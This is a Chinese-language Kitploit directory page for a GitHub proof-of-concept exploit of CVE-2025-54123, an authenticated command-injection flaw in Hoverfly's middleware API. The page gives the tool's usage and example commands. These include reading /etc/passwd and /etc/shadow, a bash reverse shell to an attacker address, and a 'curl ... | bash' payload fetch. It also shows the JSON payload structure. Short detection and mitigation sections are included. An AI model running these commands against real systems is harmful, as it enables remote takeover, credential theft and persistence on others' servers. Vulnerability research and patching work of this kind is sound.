Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/kasem545/cve-2025-54123-poc
漏洞分析漏洞利用Web应用程序漏洞利用后渗透利用渗透测试命令与控制红队Payload 开发
GitHubkasem545/cve-2025-54123-poc

CVE-2025-54123-Poc

CVE-2025-54123 Hoverfly 认证中间件命令注入 RCE

查看仓库
725个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-54123 漏洞利用

Hoverfly 认证中间件命令注入远程代码执行 | CVSS 9.8 严重

漏洞描述

Hoverfly <= 1.11.3 存在认证命令注入漏洞,可通过 /api/v2/hoverfly/middleware 端点利用。需要管理员凭据,但一旦认证成功,中间件功能会接受用户提供的二进制路径和脚本值且未经验证,从而允许任意命令执行。

漏洞利用链

  1. 输入验证不足 - middleware.go 接受任意二进制路径
  2. 不安全的命令执行 - local_middleware.go 直接将用户输入传递给 exec.Command()
  3. 立即执行 - hoverfly_service.go 在验证过程中执行中间件

要求

  • 有效的 Hoverfly 管理员凭据(用户名/密码)
  • 可访问 Hoverfly 管理员 API(默认端口 8888)

使用方法

root@kitploit:~
python3 exploit.py -t <TARGET_URL> -u <USERNAME> -p <PASSWORD> -c <COMMAND> [--shell SHELL]
  • -t, --target - Hoverfly API 端点(必需)
  • -u, --username - 管理员用户名(必需)
  • -p, --password - 管理员密码(必需)
  • -c, --command - 要执行的命令(必需)
  • --shell - 使用的 Shell 二进制路径(默认:/bin/bash)

示例

root@kitploit:~
# 基本命令执行
python3 exploit.py -t http://localhost:8888 -u admin -p password -c whoami

# 读取敏感文件
python3 exploit.py -t http://10.10.11.100:8888 -u admin -p pass123 -c "cat /etc/passwd"

# 反弹 Shell
python3 exploit.py -t http://target:8888 -u user -p secret -c "bash -i >& /dev/tcp/10.10.14.5/4444 0>&1"

# 多条命令执行
python3 exploit.py -t http://192.168.1.50:8888 -u admin -p admin -c "id; uname -a; pwd"

# 使用不同的 Shell
python3 exploit.py -t http://victim:8888 -u root -p toor -c "cat /etc/shadow" --shell /bin/sh

# 下载并执行 payload
python3 exploit.py -t http://target:8888 -u admin -p pass -c "curl http://10.10.14.5/shell.sh | bash"

攻击流程

  1. 攻击者使用有效的管理员凭据(Basic Auth)进行身份验证
  2. 向 /api/v2/hoverfly/middleware 发送包含恶意 payload 的 PUT 请求
  3. Hoverfly 将脚本写入临时文件 /tmp/hoverfly_<random>
  4. 在验证过程中执行:<shell> /tmp/hoverfly_<random>
  5. 命令输出返回至错误响应的 STDOUT 部分
  6. 漏洞利用脚本提取并显示输出

Payload 结构

root@kitploit:~
{
    "binary": "/bin/bash",
    "script": "whoami"
}

HTTP 请求头包含:

root@kitploit:~
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Content-Type: application/json

影响

  • 完全远程代码执行,具有 Hoverfly 进程权限
  • 凭证窃取 - 窃取 API 密钥、令牌、机密信息
  • 内部网络横向移动 - 攻陷相邻系统
  • 数据泄露 - 访问模拟数据、配置文件
  • 持久化 - 安装后门,维持访问
  • 服务中断 - 修改/删除中间件配置

漏洞代码位置

  • core/middleware/middleware.go:94-96 - 未对 binary 参数进行输入验证
  • core/middleware/local_middleware.go:14-19 - 不安全的 exec.Command() 使用
  • core/hoverfly_service.go:173 - 验证过程中立即执行

受影响版本

  • Hoverfly <= 1.11.3
  • 所有启用身份验证且可访问管理员 API 的安装

检测方法

查找:

  • 对 /api/v2/hoverfly/middleware 的 PUT 请求
  • 错误响应中包含 "STDOUT:" 及命令输出
  • /tmp/hoverfly/ 目录下的临时文件
  • 从 hoverfly 服务产生的异常进程执行

缓解措施

  • 升级至已修补的版本(如有)
  • 将管理员 API 访问限制为受信任的 IP
  • 使用强身份验证凭据
  • 监控 /api/v2/hoverfly/middleware 端点的访问
  • 对 binary/script 参数实施输入验证

参考来源

  • CVE-2025-54123
  • CWE-78(操作系统命令注入)
  • CWE-20(输入验证不当)
  • GHSA-r4h8-hfp2-ggmf
  • https://github.com/SpectoLabs/hoverfly/security/advisories/GHSA-r4h8-hfp2-ggmf
  • https://nvd.nist.gov/vuln/detail/CVE-2025-54123

致谢

原始发现者:@Kr1shna4garwal

下载工具